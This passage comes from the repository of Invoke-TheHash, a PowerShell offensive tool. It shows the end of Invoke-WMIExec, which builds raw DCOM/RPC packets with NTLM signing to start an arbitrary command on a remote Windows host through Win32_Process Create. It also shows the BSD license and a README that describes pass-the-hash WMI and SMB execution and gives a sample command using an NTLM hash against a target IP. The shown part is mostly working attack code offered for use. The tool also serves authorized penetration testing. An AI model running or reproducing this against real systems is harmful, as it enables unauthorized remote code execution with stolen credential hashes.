| $request_flags = 0x83 1038 | $request_auth_padding = 12 1039 | $request_call_ID = 0x03,0x00,0x00,0x00 1040 | $request_context_ID = 0x02,0x00 1041 | $request_opnum = 0x03,0x00 1042 | $request_UUID = $object_UUID2 1043 | $hostname_length = [System.BitConverter]::GetBytes($auth_hostname.Length + 1) 1044 | $WMI_client_stage_next = 'AlterContext' 1045 | 1046 | if([Bool]($auth_hostname.Length % 2)) 1047 | { 1048 | $auth_hostname_bytes += 0x00,0x00 1049 | } 1050 | else 1051 | { 1052 | $auth_hostname_bytes += 0x00,0x00,0x00,0x00 1053 | } 1054 | 1055 | $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 1056 | $causality_ID_bytes + 1057 | 0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00 + 1058 | $hostname_length + 1059 | 0x00,0x00,0x00,0x00 + 1060 | $hostname_length + 1061 | $auth_hostname_bytes + 1062 | $process_ID_bytes + 1063 | 0x00,0x00,0x00,0x00,0x00,0x00 1064 | 1065 | } 1066 | 1067 | 1 1068 | { 1069 | $sequence_number = 0x02,0x00,0x00,0x00 1070 | $request_flags = 0x83 1071 | $request_auth_padding = 8 1072 | $request_call_ID = 0x04,0x00,0x00,0x00 1073 | $request_context_ID = 0x03,0x00 1074 | $request_opnum = 0x03,0x00 1075 | $request_UUID = $IPID 1076 | $WMI_client_stage_next = 'Request' 1077 | 1078 | $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 1079 | $causality_ID_bytes + 1080 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 1081 | 1082 | } 1083 | 1084 | 2 1085 | { 1086 | $sequence_number = 0x03,0x00,0x00,0x00 1087 | $request_flags = 0x83 1088 | $request_auth_padding = 0 1089 | $request_call_ID = 0x05,0x00,0x00,0x00 1090 | $request_context_ID = 0x03,0x00 1091 | $request_opnum = 0x06,0x00 1092 | $request_UUID = $IPID 1093 | [Byte[]]$WMI_namespace_length = [System.BitConverter]::GetBytes($target_short.Length + 14) 1094 | [Byte[]]$WMI_namespace_unicode = [System.Text.Encoding]::Unicode.GetBytes("\\$target_short\root\cimv2") 1095 | $WMI_client_stage_next = 'Request' 1096 | 1097 | if([Bool]($target_short.Length % 2)) 1098 | { 1099 | $WMI_namespace_unicode += 0x00,0x00,0x00,0x00 1100 | } 1101 | else 1102 | { 1103 | $WMI_namespace_unicode += 0x00,0x00 1104 | } 1105 | 1106 | $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 1107 | $causality_ID_bytes + 1108 | 0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00 + 1109 | $WMI_namespace_length + 1110 | 0x00,0x00,0x00,0x00 + 1111 | $WMI_namespace_length + 1112 | $WMI_namespace_unicode + 1113 | 0x04,0x00,0x02,0x00,0x09,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x09, 1114 | 0x00,0x00,0x00,0x65,0x00,0x6e,0x00,0x2d,0x00,0x55,0x00,0x53,0x00, 1115 | 0x2c,0x00,0x65,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 1116 | 0x00,0x00,0x00,0x00,0x00 1117 | 1118 | } 1119 | 1120 | 3 1121 | { 1122 | $sequence_number = 0x04,0x00,0x00,0x00 1123 | $request_flags = 0x83 1124 | $request_auth_padding = 8 1125 | $request_call_ID = 0x06,0x00,0x00,0x00 1126 | $request_context_ID = 0x00,0x00 1127 | $request_opnum = 0x05,0x00 1128 | $request_UUID = $object_UUID 1129 | $WMI_client_stage_next = 'Request' 1130 | $WMI_data = [System.BitConverter]::ToString($WMI_client_receive) 1131 | $WMI_data = $WMI_data -replace "-","" 1132 | $OXID_index = $WMI_data.IndexOf($OXID) 1133 | $OXID_bytes_index = $OXID_index / 2 1134 | $IPID2 = $WMI_client_receive[($OXID_bytes_index + 16)..($OXID_bytes_index + 31)] 1135 | $packet_rem_release = New-PacketDCOMRemRelease $causality_ID_bytes $object_UUID2 $IPID 1136 | $stub_data = ConvertFrom-PacketOrderedDictionary $packet_rem_release 1137 | } 1138 | 1139 | 4 1140 | { 1141 | $sequence_number = 0x05,0x00,0x00,0x00 1142 | $request_flags = 0x83 1143 | $request_auth_padding = 4 1144 | $request_call_ID = 0x07,0x00,0x00,0x00 1145 | $request_context_ID = 0x00,0x00 1146 | $request_opnum = 0x03,0x00 1147 | $request_UUID = $object_UUID 1148 | $WMI_client_stage_next = 'Request' 1149 | $packet_rem_query_interface = New-PacketDCOMRemQueryInterface $causality_ID_bytes $IPID2 0x9e,0xc1,0xfc,0xc3,0x70,0xa9,0xd2,0x11,0x8b,0x5a,0x00,0xa0,0xc9,0xb7,0xc9,0xc4 1150 | $stub_data = ConvertFrom-PacketOrderedDictionary $packet_rem_query_interface 1151 | } 1152 | 1153 | 5 1154 | { 1155 | $sequence_number = 0x06,0x00,0x00,0x00 1156 | $request_flags = 0x83 1157 | $request_auth_padding = 4 1158 | $request_call_ID = 0x08,0x00,0x00,0x00 1159 | $request_context_ID = 0x00,0x00 1160 | $request_opnum = 0x03,0x00 1161 | $request_UUID = $object_UUID 1162 | $WMI_client_stage_next = 'AlterContext' 1163 | $packet_rem_query_interface = New-PacketDCOMRemQueryInterface $causality_ID_bytes $IPID2 0x83,0xb2,0x96,0xb1,0xb4,0xba,0x1a,0x10,0xb6,0x9c,0x00,0xaa,0x00,0x34,0x1d,0x07 1164 | $stub_data = ConvertFrom-PacketOrderedDictionary $packet_rem_query_interface 1165 | } 1166 | 1167 | 6 1168 | { 1169 | $sequence_number = 0x07,0x00,0x00,0x00 1170 | $request_flags = 0x83 1171 | $request_auth_padding = 0 1172 | $request_call_ID = 0x09,0x00,0x00,0x00 1173 | $request_context_ID = 0x04,0x00 1174 | $request_opnum = 0x06,0x00 1175 | $request_UUID = $IPID2 1176 | $WMI_client_stage_next = 'Request' 1177 | 1178 | $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 1179 | $causality_ID_bytes + 1180 | 0x00,0x00,0x00,0x00,0x55,0x73,0x65,0x72,0x0d,0x00,0x00,0x00,0x1a, 1181 | 0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x77,0x00,0x69,0x00,0x6e,0x00, 1182 | 0x33,0x00,0x32,0x00,0x5f,0x00,0x70,0x00,0x72,0x00,0x6f,0x00,0x63, 1183 | 0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 1184 | 0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00, 1185 | 0x00,0x00,0x00 1186 | 1187 | } 1188 | 1189 | 7 1190 | { 1191 | $sequence_number = 0x08,0x00,0x00,0x00 1192 | $request_flags = 0x83 1193 | $request_auth_padding = 0 1194 | $request_call_ID = 0x10,0x00,0x00,0x00 1195 | $request_context_ID = 0x04,0x00 1196 | $request_opnum = 0x06,0x00 1197 | $request_UUID = $IPID2 1198 | $WMI_client_stage_next = 'Request' 1199 | 1200 | $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 1201 | $causality_ID_bytes + 1202 | 0x00,0x00,0x00,0x00,0x55,0x73,0x65,0x72,0x0d,0x00,0x00,0x00,0x1a, 1203 | 0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x77,0x00,0x69,0x00,0x6e,0x00, 1204 | 0x33,0x00,0x32,0x00,0x5f,0x00,0x70,0x00,0x72,0x00,0x6f,0x00,0x63, 1205 | 0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 1206 | 0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00, 1207 | 0x00,0x00,0x00 1208 | 1209 | } 1210 | 1211 | {$_ -ge 8} 1212 | { 1213 | $sequence_number = 0x09,0x00,0x00,0x00 1214 | $request_auth_padding = 0 1215 | $request_call_ID = 0x0b,0x00,0x00,0x00 1216 | $request_context_ID = 0x04,0x00 1217 | $request_opnum = 0x18,0x00 1218 | $request_UUID = $IPID2 1219 | [Byte[]]$stub_length = [System.BitConverter]::GetBytes($Command.Length + 1769)[0,1] 1220 | [Byte[]]$stub_length2 = [System.BitConverter]::GetBytes($Command.Length + 1727)[0,1] 1221 | [Byte[]]$stub_length3 = [System.BitConverter]::GetBytes($Command.Length + 1713)[0,1] 1222 | [Byte[]]$command_length = [System.BitConverter]::GetBytes($Command.Length + 93)[0,1] 1223 | [Byte[]]$command_length2 = [System.BitConverter]::GetBytes($Command.Length + 16)[0,1] 1224 | [Byte[]]$command_bytes = [System.Text.Encoding]::UTF8.GetBytes($Command) 1225 | 1226 | 1227 | # thanks to @vysec for finding a bug with certain command lengths 1228 | [String]$command_padding_check = $Command.Length / 4 1229 | 1230 | if($command_padding_check -like "*.75") 1231 | { 1232 | $command_bytes += 0x00 1233 | } 1234 | elseif($command_padding_check -like "*.5") 1235 | { 1236 | $command_bytes += 0x00,0x00 1237 | } 1238 | elseif($command_padding_check -like "*.25") 1239 | { 1240 | $command_bytes += 0x00,0x00,0x00 1241 | } 1242 | else 1243 | { 1244 | $command_bytes += 0x00,0x00,0x00,0x00 1245 | } 1246 | 1247 | $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 1248 | $causality_ID_bytes + 1249 | 0x00,0x00,0x00,0x00,0x55,0x73,0x65,0x72,0x0d,0x00,0x00,0x00,0x1a, 1250 | 0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x57,0x00,0x69,0x00,0x6e,0x00, 1251 | 0x33,0x00,0x32,0x00,0x5f,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x63, 1252 | 0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x00,0x00,0x55,0x73,0x65,0x72, 1253 | 0x06,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x63, 1254 | 0x00,0x72,0x00,0x65,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x00,0x00, 1255 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00 + 1256 | $stub_length + 1257 | 0x00,0x00 + 1258 | $stub_length + 1259 | 0x00,0x00,0x4d,0x45,0x4f,0x57,0x04,0x00,0x00,0x00,0x81,0xa6,0x12, 1260 | 0xdc,0x7f,0x73,0xcf,0x11,0x88,0x4d,0x00,0xaa,0x00,0x4b,0x2e,0x24, 1261 | 0x12,0xf8,0x90,0x45,0x3a,0x1d,0xd0,0x11,0x89,0x1f,0x00,0xaa,0x00, 1262 | 0x4b,0x2e,0x24,0x00,0x00,0x00,0x00 + 1263 | $stub_length2 + 1264 | 0x00,0x00,0x78,0x56,0x34,0x12 + 1265 | $stub_length3 + 1266 | 0x00,0x00,0x02,0x53, 1267 | 0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x04, 1268 | 0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x0e,0x00,0x00,0x00,0x00,0x0b, 1269 | 0x00,0x00,0x00,0xff,0xff,0x03,0x00,0x00,0x00,0x2a,0x00,0x00,0x00, 1270 | 0x15,0x01,0x00,0x00,0x73,0x01,0x00,0x00,0x76,0x02,0x00,0x00,0xd4, 1271 | 0x02,0x00,0x00,0xb1,0x03,0x00,0x00,0x15,0xff,0xff,0xff,0xff,0xff, 1272 | 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x12,0x04,0x00,0x80,0x00,0x5f, 1273 | 0x5f,0x50,0x41,0x52,0x41,0x4d,0x45,0x54,0x45,0x52,0x53,0x00,0x00, 1274 | 0x61,0x62,0x73,0x74,0x72,0x61,0x63,0x74,0x00,0x08,0x00,0x00,0x00, 1275 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00, 1276 | 0x00,0x00,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x4c,0x69,0x6e,0x65, 1277 | 0x00,0x00,0x73,0x74,0x72,0x69,0x6e,0x67,0x00,0x08,0x00,0x00,0x00, 1278 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00, 1279 | 0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00,0x37,0x00,0x00, 1280 | 0x00,0x00,0x49,0x6e,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 1281 | 0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,0x00,0x0a,0x00,0x00, 1282 | 0x80,0x03,0x08,0x00,0x00,0x00,0x37,0x00,0x00,0x00,0x5e,0x00,0x00, 1283 | 0x00,0x02,0x0b,0x00,0x00,0x00,0xff,0xff,0x01,0x00,0x00,0x00,0x94, 1284 | 0x00,0x00,0x00,0x00,0x57,0x69,0x6e,0x33,0x32,0x41,0x50,0x49,0x7c, 1285 | 0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x61,0x6e,0x64,0x20,0x54, 1286 | 0x68,0x72,0x65,0x61,0x64,0x20,0x46,0x75,0x6e,0x63,0x74,0x69,0x6f, 1287 | 0x6e,0x73,0x7c,0x6c,0x70,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x4c, 1288 | 0x69,0x6e,0x65,0x20,0x00,0x00,0x4d,0x61,0x70,0x70,0x69,0x6e,0x67, 1289 | 0x53,0x74,0x72,0x69,0x6e,0x67,0x73,0x00,0x08,0x00,0x00,0x00,0x00, 1290 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x29,0x00,0x00,0x00, 1291 | 0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00,0x37,0x00,0x00,0x00, 1292 | 0x5e,0x00,0x00,0x00,0x02,0x0b,0x00,0x00,0x00,0xff,0xff,0xca,0x00, 1293 | 0x00,0x00,0x02,0x08,0x20,0x00,0x00,0x8c,0x00,0x00,0x00,0x00,0x49, 1294 | 0x44,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 1295 | 0x00,0x00,0x00,0x36,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08, 1296 | 0x00,0x00,0x00,0x59,0x01,0x00,0x00,0x5e,0x00,0x00,0x00,0x00,0x0b, 1297 | 0x00,0x00,0x00,0xff,0xff,0xca,0x00,0x00,0x00,0x02,0x08,0x20,0x00, 1298 | 0x00,0x8c,0x00,0x00,0x00,0x11,0x01,0x00,0x00,0x11,0x03,0x00,0x00, 1299 | 0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x74,0x72,0x69,0x6e,0x67,0x00, 1300 | 0x08,0x00,0x00,0x00,0x01,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00, 1301 | 0x00,0x04,0x00,0x00,0x00,0x00,0x43,0x75,0x72,0x72,0x65,0x6e,0x74, 1302 | 0x44,0x69,0x72,0x65,0x63,0x74,0x6f,0x72,0x79,0x00,0x00,0x73,0x74, 1303 | 0x72,0x69,0x6e,0x67,0x00,0x08,0x00,0x00,0x00,0x01,0x00,0x04,0x00, 1304 | 0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x0a,0x00,0x00, 1305 | 0x80,0x03,0x08,0x00,0x00,0x00,0x85,0x01,0x00,0x00,0x00,0x49,0x6e, 1306 | 0x00,0x08,0x00,0x00,0x00,0x01,0x00,0x04,0x00,0x00,0x00,0x00,0x00, 1307 | 0x00,0x00,0x1c,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00, 1308 | 0x00,0x00,0x85,0x01,0x00,0x00,0xac,0x01,0x00,0x00,0x02,0x0b,0x00, 1309 | 0x00,0x00,0xff,0xff,0x01,0x00,0x00,0x00,0xe2,0x01,0x00,0x00,0x00, 1310 | 0x57,0x69,0x6e,0x33,0x32,0x41,0x50,0x49,0x7c,0x50,0x72,0x6f,0x63, 1311 | 0x65,0x73,0x73,0x20,0x61,0x6e,0x64,0x20,0x54,0x68,0x72,0x65,0x61, 1312 | 0x64,0x20,0x46,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x73,0x7c,0x43, 1313 | 0x72,0x65,0x61,0x74,0x65,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x7c, 1314 | 0x6c,0x70,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x44,0x69,0x72,0x65, 1315 | 0x63,0x74,0x6f,0x72,0x79,0x20,0x00,0x00,0x4d,0x61,0x70,0x70,0x69, 1316 | 0x6e,0x67,0x53,0x74,0x72,0x69,0x6e,0x67,0x73,0x00,0x08,0x00,0x00, 1317 | 0x00,0x01,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x29,0x00, 1318 | 0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00,0x85,0x01, 1319 | 0x00,0x00,0xac,0x01,0x00,0x00,0x02,0x0b,0x00,0x00,0x00,0xff,0xff, 1320 | 0x2b,0x02,0x00,0x00,0x02,0x08,0x20,0x00,0x00,0xda,0x01,0x00,0x00, 1321 | 0x00,0x49,0x44,0x00,0x08,0x00,0x00,0x00,0x01,0x00,0x04,0x00,0x00, 1322 | 0x00,0x00,0x00,0x00,0x00,0x36,0x00,0x00,0x00,0x0a,0x00,0x00,0x80, 1323 | 0x03,0x08,0x00,0x00,0x00,0xba,0x02,0x00,0x00,0xac,0x01,0x00,0x00, 1324 | 0x00,0x0b,0x00,0x00,0x00,0xff,0xff,0x2b,0x02,0x00,0x00,0x02,0x08, 1325 | 0x20,0x00,0x00,0xda,0x01,0x00,0x00,0x72,0x02,0x00,0x00,0x11,0x03, 1326 | 0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x73,0x74,0x72,0x69,0x6e, 1327 | 0x67,0x00,0x0d,0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x00,0x00,0x00, 1328 | 0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x50,0x72,0x6f,0x63,0x65, 1329 | 0x73,0x73,0x53,0x74,0x61,0x72,0x74,0x75,0x70,0x49,0x6e,0x66,0x6f, 1330 | 0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,0x00,0x00,0x6f,0x62,0x6a,0x65, 1331 | 0x63,0x74,0x00,0x0d,0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x00,0x00, 1332 | 0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03, 1333 | 0x08,0x00,0x00,0x00,0xef,0x02,0x00,0x00,0x00,0x49,0x6e,0x00,0x0d, 1334 | 0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 1335 | 0x1c,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00, 1336 | 0xef,0x02,0x00,0x00,0x16,0x03,0x00,0x00,0x02,0x0b,0x00,0x00,0x00, 1337 | 0xff,0xff,0x01,0x00,0x00,0x00,0x4c,0x03,0x00,0x00,0x00,0x57,0x4d, 1338 | 0x49,0x7c,0x57,0x69,0x6e,0x33,0x32,0x5f,0x50,0x72,0x6f,0x63,0x65, 1339 | 0x73,0x73,0x53,0x74,0x61,0x72,0x74,0x75,0x70,0x00,0x00,0x4d,0x61, 1340 | 0x70,0x70,0x69,0x6e,0x67,0x53,0x74,0x72,0x69,0x6e,0x67,0x73,0x00, 1341 | 0x0d,0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00, 1342 | 0x00,0x29,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00, 1343 | 0x00,0xef,0x02,0x00,0x00,0x16,0x03,0x00,0x00,0x02,0x0b,0x00,0x00, 1344 | 0x00,0xff,0xff,0x66,0x03,0x00,0x00,0x02,0x08,0x20,0x00,0x00,0x44, 1345 | 0x03,0x00,0x00,0x00,0x49,0x44,0x00,0x0d,0x00,0x00,0x00,0x02,0x00, 1346 | 0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x00,0x00,0x00,0x0a, 1347 | 0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00,0xf5,0x03,0x00,0x00,0x16, 1348 | 0x03,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0xff,0xff,0x66,0x03,0x00, 1349 | 0x00,0x02,0x08,0x20,0x00,0x00,0x44,0x03,0x00,0x00,0xad,0x03,0x00, 1350 | 0x00,0x11,0x03,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x6f,0x62, 1351 | 0x6a,0x65,0x63,0x74,0x3a,0x57,0x69,0x6e,0x33,0x32,0x5f,0x50,0x72, 1352 | 0x6f,0x63,0x65,0x73,0x73,0x53,0x74,0x61,0x72,0x74,0x75,0x70 + 1353 | (,0x00 * 501) + 1354 | $command_length + 1355 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3c,0x0e,0x00,0x00,0x00,0x00, 1356 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x01 + 1357 | $command_length2 + 1358 | 0x00,0x80,0x00,0x5f,0x5f,0x50,0x41,0x52,0x41,0x4d,0x45,0x54,0x45, 1359 | 0x52,0x53,0x00,0x00 + 1360 | $command_bytes + 1361 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 1362 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 1363 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 1364 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x02,0x00,0x00,0x00, 1365 | 0x00,0x00,0x00,0x00,0x00,0x00 1366 | 1367 | if($Stub_data.Length -lt $request_split_index) 1368 | { 1369 | $request_flags = 0x83 1370 | $WMI_client_stage_next = 'Result' 1371 | } 1372 | else 1373 | { 1374 | $request_split = $true 1375 | $request_split_stage_final = [Math]::Ceiling($stub_data.Length / $request_split_index) 1376 | 1377 | if($request_split_stage -lt 2) 1378 | { 1379 | $request_length = $stub_data.Length 1380 | $stub_data = $stub_data[0..($request_split_index - 1)] 1381 | $request_split_stage = 2 1382 | $sequence_number_counter = 10 1383 | $request_flags = 0x81 1384 | $request_split_index_tracker = $request_split_index 1385 | $WMI_client_stage_next = 'Request' 1386 | } 1387 | elseif($request_split_stage -eq $request_split_stage_final) 1388 | { 1389 | $request_split = $false 1390 | $sequence_number = [System.BitConverter]::GetBytes($sequence_number_counter) 1391 | $request_split_stage = 0 1392 | $stub_data = $stub_data[$request_split_index_tracker..$stub_data.Length] 1393 | $request_flags = 0x82 1394 | $WMI_client_stage_next = 'Result' 1395 | } 1396 | else 1397 | { 1398 | $request_length = $stub_data.Length - $request_split_index_tracker 1399 | $stub_data = $stub_data[$request_split_index_tracker..($request_split_index_tracker + $request_split_index - 1)] 1400 | $request_split_index_tracker += $request_split_index 1401 | $request_split_stage++ 1402 | $sequence_number = [System.BitConverter]::GetBytes($sequence_number_counter) 1403 | $sequence_number_counter++ 1404 | $request_flags = 0x80 1405 | $WMI_client_stage_next = 'Request' 1406 | } 1407 | 1408 | } 1409 | 1410 | } 1411 | 1412 | } 1413 | 1414 | $packet_RPC = New-PacketRPCRequest $request_flags $stub_data.Length 16 $request_auth_padding $request_call_ID $request_context_ID $request_opnum $request_UUID 1415 | 1416 | if($request_split) 1417 | { 1418 | $packet_RPC["AllocHint"] = [System.BitConverter]::GetBytes($request_length) 1419 | } 1420 | 1421 | $packet_NTLMSSP_verifier = New-PacketNTLMSSPVerifier $request_auth_padding 0x04 $sequence_number 1422 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 1423 | $NTLMSSP_verifier = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_verifier 1424 | $RPC_signature = $HMAC_MD5.ComputeHash($sequence_number + $RPC + $stub_data + $NTLMSSP_verifier[0..($request_auth_padding + 7)]) 1425 | $RPC_signature = $RPC_signature[0..7] 1426 | $packet_NTLMSSP_verifier["NTLMSSPVerifierChecksum"] = $RPC_signature 1427 | $NTLMSSP_verifier = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_verifier 1428 | $WMI_client_send = $RPC + $stub_data + $NTLMSSP_verifier 1429 | $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 1430 | $WMI_client_random_port_stream.Flush() 1431 | 1432 | if(!$request_split) 1433 | { 1434 | $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 1435 | } 1436 | 1437 | while($WMI_client_random_port_stream.DataAvailable) 1438 | { 1439 | $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 1440 | Start-Sleep -m $Sleep 1441 | } 1442 | 1443 | $WMI_client_stage = $WMI_client_stage_next 1444 | } 1445 | 1446 | 'Result' 1447 | { 1448 | 1449 | while($WMI_client_random_port_stream.DataAvailable) 1450 | { 1451 | $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 1452 | Start-Sleep -m $Sleep 1453 | } 1454 | 1455 | if($WMI_client_receive[1145] -ne 9) 1456 | { 1457 | $target_process_ID = Get-UInt16DataLength 1141 $WMI_client_receive 1458 | Write-Output "[+] Command executed with process ID $target_process_ID on $target_long" 1459 | } 1460 | else 1461 | { 1462 | Write-Output "[-] Process did not start, check your command" 1463 | } 1464 | 1465 | $WMI_client_stage = 'Exit' 1466 | } 1467 | 1468 | } 1469 | 1470 | Start-Sleep -m $Sleep 1471 | 1472 | } 1473 | 1474 | $WMI_client_random_port.Close() 1475 | $WMI_client_random_port_stream.Close() 1476 | } 1477 | 1478 | $WMI_client.Close() 1479 | $WMI_client_stream.Close() 1480 | } 1481 | 1482 | } 1483 | 1484 | } -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, Kevin Robertson 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Invoke-TheHash 2 | Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side. 3 | 4 | # Requirements 5 | Minimum PowerShell 2.0 6 | 7 | # Import 8 | Import-Module ./Invoke-TheHash.psd1 9 | 10 | or 11 | 12 | . ./Invoke-WMIExec.ps1 13 | . ./Invoke-SMBExec.ps1 14 | . ./Invoke-SMBEnum.ps1 15 | . ./Invoke-SMBClient.ps1 16 | . ./Invoke-TheHash.ps1 17 | 18 | ## Functions 19 | * Invoke-WMIExec 20 | * Invoke-SMBExec 21 | * Invoke-SMBEnum 22 | * Invoke-SMBClient 23 | * Invoke-TheHash 24 | 25 | ### Invoke-WMIExec 26 | * WMI command execution function. 27 | 28 | ##### Parameters: 29 | * __Target__ - Hostname or IP address of target. 30 | * __Username__ - Username to use for authentication. 31 | * __Domain__ - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. 32 | * __Hash__ - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. 33 | * __Command__ - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. 34 | * __Sleep__ - Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. 35 | 36 | ##### Example: 37 | Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose 38 | 39 | ##### 